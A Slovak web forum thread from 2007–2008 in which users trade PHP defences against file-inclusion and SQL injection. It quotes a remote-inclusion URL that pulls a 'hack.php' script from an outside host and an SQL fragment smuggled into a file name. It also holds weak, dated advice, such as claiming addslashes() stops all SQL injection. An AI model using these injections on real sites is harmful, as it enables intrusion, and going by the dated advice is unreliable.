| Autor | Správa |
pepek92
 Užívateľ
 Založený: 21.01.2007 Príspevky: 660
 | Zaslal: Po 31.12.07 16:10 |   |
Ako sa bránite proti PHP injection vo svojich skriptoch? Aké metódy sú podľa vás účinné? Taktiež, ako sa bránite proti otváraniu nechcených PHP súborov ako sú súbory s prihlásením sa na DB a heslami? Diskusia...
Viac o PHP injection tu.
K PHP injection, include() iba cez premenné, súbory zašívam do priečinka a nepridávam do adresy príponu. Čo sa týka otvárania súborov používam metódu známu z phpBB:
| kód: | V hlavnom súbore:
define ('niečo', true);
V includovaných súboroch:
if (!defined('niečo')) { exit; } |
|
| |
   |
 |
vl4kn0
 Užívateľ
 Založený: 22.11.2007 Príspevky: 254 Bydlisko: 127.0.0.1
 | Zaslal: Po 31.12.07 20:13 |   |
hej to z phpBB robim aj ja:D potom este pouzivam jednu fciu a to:
| kód: | function protect($var)
{
foreach ($var as $k => $v)
{
$protected[$k] = addslashes($var[$k]);
}
return $protected;
} |
co si vlastne ked mam nejake get a post premenne tak si ich takto osetrim a viem ze na mna ziadne sql injection neplatia.
potom este definujem premennu s priponov php
| kód: | | $phpEx = substr(strstr(__FILE__, '.'), 1); |
a v tom subore includujem config kde mam udaje s databazov. a a hned po scripte fciou unset() zmazem premennu heslo a table prefix.
a nazaver ked potrebujem nieco nechat len pre adminov nejake filezz tak osetrujem hned na zaciatku tak ze vyberiem session z databazi a zistim aky ma rank. ak zly tak ho presmeruje na index.
a aby som nezabudol za kazdym sql query davam | kód: | | or die(sprintf("Mysql query failed on file %s and line %d"), __FILE__, __LINE__); |
|
_________________ PODPIS BOL ZMAZANY Z DOVODU NERESPEKTOVANIA PRAVIDIEL FORA!!!
Je povolených max. 5 riadkov s veľkosťou písma 9 (rozlíšenie 1280x1024px).
Sprava pre vedenie fora: ake nerespektovanie pravidiel. ved som mal v podpise citaciu na 2 riadky omg? lol? no a este jabber ale to neni moja chyba ze tu nemate input aj na jabber... | |
     |
 |
chrono
 Skúsený užívateľ
 Založený: 13.11.2007 Príspevky: 804
 | Zaslal: Po 31.12.07 21:09 |   |
Zobrazovanie chybových hlášok (podľa mňa) nie je najlepší nápad. Môžeš tým potencionálnemu útočníkovi prezradiť príliš veľa informácií. |
| |
  |
 |
vl4kn0
 Užívateľ
 | Zaslal: Po 31.12.07 21:20 |   |
| chrono napísal: | | Zobrazovanie chybových hlášok (podľa mňa) nie je najlepší nápad. Môžeš tým potencionálnemu útočníkovi prezradiť príliš veľa informácií. |
no z toho co som dal. by si moc toho nevyrozumel. kedze si zober. nevies nazov tabulky ani databazi nic. poznas len subor. a to poznas aj na phpBB , drupal, phpfusion a mnoho dalsich, to by ma moc neiritovalo |
Sprava pre vedenie fora: ake nerespektovanie pravidiel. ved som mal v podpise citaciu na 2 riadky omg? lol? no a este jabber ale to neni moja chyba ze tu nemate input aj na jabber... | |
     |
 |
audiotrack
 Zablokovaný užívateľ
 Založený: 17.11.2006 Príspevky: 680
 | Zaslal: Po 31.12.07 22:20 |   |
| vl4kn0 napísal: | hej to z phpBB robim aj ja:D potom este pouzivam jednu fciu a to:
| kód: | function protect($var)
{
foreach ($var as $k => $v)
{
$protected[$k] = addslashes($var[$k]);
}
return $protected;
} |
co si vlastne ked mam nejake get a post premenne tak si ich takto osetrim a viem ze na mna ziadne sql injection neplatia.
... | by si sa dosť okakal, ale musím ťa sklamať.. addslashes je slabá ochrana.. niekde som o tom čítal článok, keby ho nájdem tak ti ho pošlem.. išlo o to, že addslashes pracuje istým princípom, a dá sa ho oklamať tak, aby niektoré znaky zle "chápal" |
| |
  |
 |
vl4kn0
 Užívateľ
 |
ako myslim si ze na nejaky sql injection staci
ale to neznamena ze adslashes nemozem zamenit za str_replace alebo ereg_replace
kde budem odchytavat iba text a cislice. ak budem odytavat iba stringy a cilice tak uz to nemoze nikto o....t. kazdemu podla jeho chuti ale kazdopadne. ziadna obrana nieje dokonala a vzdy sa najde nejaky spekulant ktory to dokaze "obist". napr. koho z vas napadlo ochranovat proti sql injection aj nazvy uploadovanych suborov? lebo ak niekto da vazov suboru ako select * from name_of_table where id = 0 -- ??lebo aj to je druh injections  |
     |
 |
pepek92
 Užívateľ
 Založený: 21.01.2007 Príspevky: 660
 | Zaslal: Ut 01.01.08 10:41 |   |
Ešte ma napadla zaujímavá ochrana, okrem základného define z phpBB, čo som už vyššie písal, tak aj ochrana cez $_SERVER:
| kód: | if (!defined('NIEČO') OR (
$_SERVER['DOCUMENT_ROOT'] != '/www/***/public_html' && $_SERVER['DOCUMENT_ROOT'] != 'E:/***'))
{ exit; } |
Sú tam dve rôzne "porovnávačky" s $_SERVER['DOCUMENT_ROOT'] pretože skript robím aj u seba na localhoste, ale aby to aj platilo na už skutočnom serveri... |
| |
   |
 |
Tominator
 Zablokovaný užívateľ
 Založený: 21.02.2007 Príspevky: 4009
 | Zaslal: Št 03.01.08 13:56 |   |
neriešim použijes .hdacess na to aby si útočník nemohol prezerať súbor s pripojovacími nastaveniami
2. rada použite aj obmedzenia pre robotov aby vam admin stranky neindexovali  |
| |
  |
 |
suchy
 Čestný člen
 Založený: 17.10.2006 Príspevky: 1770
 | Zaslal: Št 03.01.08 14:12 |   |
| citácia: | | 2. rada použite aj obmedzenia pre robotov aby vam admin stranky neindexovali | prave toto by som nerobil pretoze ten subor sa da velmi lahko vygooglovat a prezret, takze vies kde sa tie admin stranky nachadzaju. naopak ked o nich nemas ziadnu zmienku google ti ich neindexuje, ved ako by aj mohol ked sa k nim nevie prihlasit. |
_________________ A Real Programmer might or might not know his wife's name. He does, however, know the entire ASCII code table. | |
     |
 |
vl4kn0
 Užívateľ
 | Zaslal: Št 03.01.08 14:16 |   |
| citácia: | a nazaver ked potrebujem nieco nechat len pre adminov nejake filezz tak osetrujem hned na zaciatku tak ze vyberiem session z databazi a zistim aky ma rank. ak zly tak ho presmeruje na index.
|
prvykrat citujem sam seba ale k veci. nemyslim ze google a ani iny bota je az taky mocny hackersky nastroj ze to dokaze obist cize to bude neindexovatelne  |
     |
 |
Tominator
 Zablokovaný užívateľ
 Založený: 21.02.2007 Príspevky: 4009
 | Zaslal: Pi 04.01.08 15:02 |   |
| suchy napísal: | | citácia: | | 2. rada použite aj obmedzenia pre robotov aby vam admin stranky neindexovali | prave toto by som nerobil pretoze ten subor sa da velmi lahko vygooglovat a prezret, takze vies kde sa tie admin stranky nachadzaju. naopak ked o nich nemas ziadnu zmienku google ti ich neindexuje, ved ako by aj mohol ked sa k nim nevie prihlasit. |
spravne suchy beriem späť |
| |
  |
 |
neopagan
 Užívateľ
 Založený: 07.08.2006 Príspevky: 675
 | Zaslal: Ut 22.01.08 23:19 |   |
Hm, ja mam stranky robene tiez sposobom inckude, ale mam to takto: | kód: | switch ($page) {
case 1:
include_once "zoznam.php";
break;
case 2:
include_once "reklama.php";
break;
.
.
.
default:
include_once "uvod.php";
break;
|
Cize nemam tam priamo GET, ale po includovani URL vyzera nejako takto ... /index.php?page=2. Je aj tento sposob ohrozeny?
Na niektorych strankach, kde mam uploadnute clanky, vyzera URL takto: index.php?ID=2 /kde ID je vlastne ID clanku/
Viete mi poradit jednoduchy sposob, ako toto ochranit od SQL a kadejakych inych injection?
Vdaka, rad sa poucim... |
| |
  |
 |
suchy
 Čestný člen
 Založený: 17.10.2006 Príspevky: 1770
 | Zaslal: St 23.01.08 11:39 |   |
na tvoj konkretny skript je sql injection nepouzitelna. co sa tyka ochrany pred nim, mame tu trebars direktivu magic_quotes_gpc, alebo funkcie mysql_real_escape_string() pripadne addslashes(). zakladom ochrany je filtrovat uzivatelsky vstup, v pripade xss aj vystup. napriklad odfiltrovat nechcene tagy, ci atributy tagov, pripadne odfiltrovat vsetko okrem plaintextu. dalej je dobre mat osetrene chybove hlasenia, bo tie dokazu tiez dost napovedat a takto by sme mohli pokracovat. ohladom bezpecnosti webaplikacii je to na dlhsiu debatu, vysla o tom aj celkom zaujimava kniha Zranitelny kod. |
_________________ A Real Programmer might or might not know his wife's name. He does, however, know the entire ASCII code table. | |
     |
 |
neopagan
 Užívateľ
 Založený: 07.08.2006 Príspevky: 675
 | Zaslal: St 23.01.08 16:16 |   |
a co napr. php injection? ked niekto dosadi namiesto adresy index.php?page=2 nejaky svoj script napr. index.php?page=http://www.necomoje.ic.cz/hack.php ako je uvedene napr. tu http://www.chill.sk/clanky/php-injection/?
Alebo druhy pripad, ked mam uz spominane index.php?ID=2 /kde ID je vlastne ID clanku/ ? Jedna vec su vstupne data, ktore sa osetrit daju, ale druha vec je ak mi namiesto adresy dosadia kadejake svoje scripty, ktore potom includuje namiesto mojich a zobrazi sa obsah mojich scriptov /napr. pomocou show source.../ |
| |
  |
 |
kmsa
 Užívateľ
 Založený: 26.07.2006 Príspevky: 1383 Bydlisko: Slovakia-Košice
 | Zaslal: St 23.01.08 17:36 |   |
ak dosadi namiesto page=2 page=http://www.necomoje.ic.cz/hack.php a ak je script cez switch tak potom hodi na uvod.php
a v tom id ak je prenasane napr: id clanku ktore ma byt otvorene tak by najjednoduchsie riesene by bolo ze preskumas to ci to je ciselna hodnota a nech tam niesu takmer ziadne znaky a dalsie a az potom to das prejst cez databazu + aj tam to dajak osetri
ale tam uz naj niekto iny hodi navod |
_________________ CPU: Intel E7200 momentalne default + freezer 7 pro | MB: Gigabyte GA-P35-DS3 rev. 2.0 F14 | RAM: A-DATA 4x1GB EE Vitesta | VGA: ATI Radeon HD4850 Sapphire Dual Slot | Monitor: BenQ E2200HD+17CTX | HDD: WD 3200AAKS + Maxtor 6Y080M0 80GB SATAII + 120GB ATA Barracuda | PSU: Corsair VX450W | Windows 7 Ultimate Sk | REPRO: Logitech X-210
+
IPhone 3GS JB 3.1.3 (new BR)
múdry sa postara o seba ale ešte múdrejši sa postara aj o druhých | |
    |
 |
|